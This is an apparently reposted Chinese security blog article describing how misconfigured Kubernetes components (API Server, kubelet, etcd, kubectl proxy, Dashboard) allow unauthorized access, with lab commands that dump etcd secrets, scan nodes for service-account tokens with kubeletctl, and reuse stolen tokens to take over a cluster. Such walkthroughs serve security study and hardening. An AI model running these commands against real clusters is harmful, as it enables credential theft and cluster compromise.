K8s攻击案例:组件未授权访问导致集群入侵

这篇具有很好参考价值的文章主要介绍了K8s攻击案例:组件未授权访问导致集群入侵。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

K8s集群往往会因为组件的不安全配置存在未授权访问的情况,如果攻击者能够进行未授权访问,可能导致集群节点遭受入侵。比较常见的的组件未授权访问漏洞,主要包括 API Server 未授权访问、kubelet 未授权访问、etcd 未授权访问、kube-proxy 不安全配置、Dashboard未授权访问。

接下来,我们将对这几个未授权访问的攻击场景和攻击过程进行详细的分析。

01、 API Server未授权访问

API Server 是集群的管理入口,任何资源请求或调用都是通过kube-apiserver提供的接口进行。默认情况下,API Server提供两个端口服务,8080和6443,配置不当将出现未授权访问。

8080端口,默认不启动,无需认证和授权检查,一旦暴露将导致未授权访问。

6443端口,默认启动需要认证,如果出现配置错误,将system:anonymous用户绑定到cluster-admin用户组,将出现未授权访问。

(1)攻击场景

insecure-port默认值为0,将其修改为8080端口,再添加insecure-bind-address=0.0.0.0,允许远程访问本地的8080端口。

vi /etc/kubernetes/manifests/kube-apiserver.yaml


    - --insecure-port=8080
    - --insecure-bind-address=0.0.0.0

修改kube-apiserver.yaml文件:

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

无需启动,等待一会以后,8080服务自动起来了,通过浏览器可以访问8080端口返回API列表。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

(2)攻击过程

未授权访问的情况下,kubectl可以使用-s参数指定Kubernetes API服务器地址和端口,直接执行命令创建恶意Pod,将其挂载到Master节点,从而实现对整个集群的接管。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

02、 kubelet未授权访问

kubelet会在集群中每个节点运行,对容器进行生命周期的管理,如果kubelet配置不当,攻击者可创建恶意Pod尝试逃逸到宿主机。

(1)攻击场景

anonymous默认为false,修改为true,并将mode从Webhook修改为AlwaysAllow。

vi /var/lib/kubelet/config.yaml
anonymous:
    enabled: true


authorization:
  mode: AlwayAllow

修改node节点配置,重启kubelet服务。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

访问kubelet 10250服务,出现未授权访问。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

(2) 攻击过程

kubeletctl 是一个用于与kubelet API 交互的命令行工具,可以通过kubeletctl执行命令获取Node权限。从Node节点窃取高权限服务账户token,使用服务账户向API Server进行验证,从而获取集群权限。

wget https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64
chmod 777 kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 kubeletctl
#列出kubelet的所有pod
./kubeletctl pods -i --server 192.168.44.136


#搜索容器里面的Service Account
./kubeletctl scan token -i --server 192.168.44.136

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

03、etcd 未授权访问

etcd 用于存储K8s集群中的所有配置数据和状态信息,如果管理员配置不当,导致etcd未授权访问的情况,那么攻击者就可以从etcd中获取secrets&token等关键信息,进而通过kubectl创建恶意pod从而接管集群。

(1)攻击场景

将client-cert-auth=true 改为false,把listen-client-urls监听修改为0.0.0.0,将端口被暴露出去,导致etcd存在未授权访问漏洞。

vi /etc/kubernetes/manifests/etcd.yaml
    - --client-cert-auth=false
    - --listen-client-urls=http://0.0.0.0:2379

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

(2)攻击过程

下载etcdctl直接用命令行即可访问etcd

s://github.com/etcd-io/etcd/releases/download/v3.4.9/etcd-v3.4.9-linux-amd64.tar.gz
tar -xf etcd-v3.4.9-linux-amd64.tar.gz
cd etcd-v3.4.9-linux-amd64
#读取etcd中存储的数据,通过--limit选项限制数量
export ETCDCTL_API=3
./etcdctl --endpoints=192.168.44.138:2379  get / --prefix --limit=2

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

#获取k8s的secrets和token
 ./etcdctl --endpoints=192.168.44.138:2379  get / --prefix --keys-only   |grep secrets
 ./etcdctl --endpoints=192.168.44.138:2379  get /registry/secrets/test/bypass-token-p6xpj

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

成功获取高权限服务账号token

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

通过token访问API-Server,可进一步创建恶意Pod,获取集群管理员的权限。

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token=“[.token.]” -n kube-system get pods

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

04、kube-proxy不安全配置

通过使用kube-proxy暴露未授权访问的服务或组件,可能会形成外部攻击入口点,从而导致集群被入侵。

(1)攻击场景

使用kubectl proxy命令设置API server接收所有主机的请求。

kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

(2)攻击过程

攻击者可通过特定端口访问API Server,可按照API Server未授权访问情况直接接管集群。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

05、Dashboard未授权访问

Dashboard 在配置不当情况下有可能会产生未授权访问的情况,从而有可能进一步造成接管集群。

(1)攻击场景

在deployment中开启enable-skip-login,那么就可以在登录界面点击跳过登录进dashboard。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

将默认的Kubernetes-dashboard绑定cluster-admin,拥有管理集群管权限

kubectl create clusterrolebinding dashboard-1  --clusterrole=cluster-admin --serviceaccount=kubernetes-dashboard:kubernetes-dashboard

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

(2)攻击过程

访问Kubernetes 仪表盘,出现了跳过按钮,点击跳过进入dashboard。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

进入控制面板,可以看到整个集群的资源情况。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生

攻击者通过创建恶意pod,将其挂载到Master节点,从而实现对整个集群的接管。

K8s攻击案例:组件未授权访问导致集群入侵,kubernetes,容器,云原生文章来源地址https://www.toymoban.com/news/detail-774417.html

到了这里,关于K8s攻击案例:组件未授权访问导致集群入侵的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • k8s简介、虚拟机快速搭建k8s集群、集群管理方式及K8S工作原理和组件介绍

    1.1、部署方式的变迁 传统部署时代: 在物理服务器上运行应用程序 无法为应用程序定义资源边界 导致资源分配问题 例如,如果在物理服务器上运行多个应用程序,则可能会出现一个应用程序占用大部分资源的情况, 结果可能导致其他应用程序的性能下降。 一种解决方案是

    2024年02月12日
    浏览(80)
  • K8s集群架构组件(3)

     (2)node组件 kubelet:master排到node节点代表,管理本机容器 kube-proxy:提供网络代理,负载均衡等操作

    2024年02月17日
    浏览(40)
  • k8s实现外部访问minikube集群

    我们现在大家都知道了 minikube集群相当于k8s的一个虚拟机。 同时pod每次消亡重建之后都会分配一个虚拟的ip,这个ip可供集群内部访问,但是如果要对外访问呢? 我们可以给他暴露ip出来,但是如果pod宕机后重建ip就发生了变化,所以不能对pod进行ip的暴露。 那应该对什么进行

    2024年02月03日
    浏览(48)
  • K8S集群实现外部访问(INGRESS)

    环境: master node01 node02 192.168.1.40 192.168.1.41 192.168.1.42 作用:Ingress 是对集群中服务的外部访问进行管理的 API 对象。 PS:创建nginx和httpd PS:namespace为ingress-nginx PS:它现在已经有一个模板,用来描述Ingress资源能够收集到的信息了 PS:有DNS的话可以设置解析,没有的话必须在h

    2024年01月19日
    浏览(46)
  • k8s实战案例之部署Zookeeper集群

    zookeeper是一个开源的分布式协调服务,由知名互联网公司Yahoo创建,它是Chubby的开源实现;换句话讲,zookeeper是一个典型的分布式数据一致性解决方案,分布式应用程序可以基于它实现数据的发布/订阅、负载均衡、名称服务、分布式协调/通知、集群管理、Master选举、分布式锁

    2024年02月08日
    浏览(53)
  • K8S集群中Node节点资源不足导致Pod无法运行的故障排查思路

    故障一:Pod数量太多超出物理节点的限制 每一台Node节点中默认限制最多运行110个Pod资源,当一个应用程序有成百上千的Pod资源时,如果不扩容Node节点或者修改最大Pod数量限制,那么就会导致部分Pod资源无法正常运行,因为节点已经没有资源可以被调度了。 解决思路就是扩容

    2024年02月02日
    浏览(45)
  • k8s配置ingress访问集群外部资源

    使用ingress访问外部资源,首先需要创建service指向我们需要访问的资源 而每个service包含一个endpoint endpoint是k8s集群中的一个资源对象,存储在etcd中,用来记录一个service对应的所有pod的访问地址。service配置selector,endpoint controller才会自动创建对应的endpoint对象;否则,不会生

    2024年02月09日
    浏览(42)
  • K8s 部署 CNI 网络组件+k8s 多master集群部署+负载均衡

    ------------------------------ 部署 CNI 网络组件 ------------------------------ ---------- 部署 flannel ---------- K8S 中 Pod 网络通信: ●Pod 内容器与容器之间的通信 在同一个 Pod 内的容器(Pod 内的容器是不会跨宿主机的)共享同一个网络命名空间,相当于它们在同一台机器上一样,可以用 lo

    2024年02月08日
    浏览(48)
  • K8S访问控制------认证(authentication )、授权(authorization )、准入控制(admission control )体系

    在K8S体系中有两种账号类型:User accounts(用户账号),即针对human user的;Service accounts(服务账号),即针对pod的。这两种账号都可以访问 API server,都需要经历认证、授权、准入控制等步骤,相关逻辑图如下所示: 在K8S架构中,可以使用多种认证方式,比如:X509 Client Cer

    2024年02月11日
    浏览(35)
  • k8s中部署nginx-ingress实现外部访问k8s集群内部服务

    k8s通过nginx-ingress实现集群外网访问功能 1.1 ingress 工作原理 step1:ingress contronler通过与k8s的api进行交互,动态的去感知k8s集群中ingress服务规则的变化,然后读取它,并按照定义的ingress规则,转发到k8s集群中对应的service。 step2:而这个ingress规则写明了哪个域名对应k8s集群中的

    2024年02月07日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包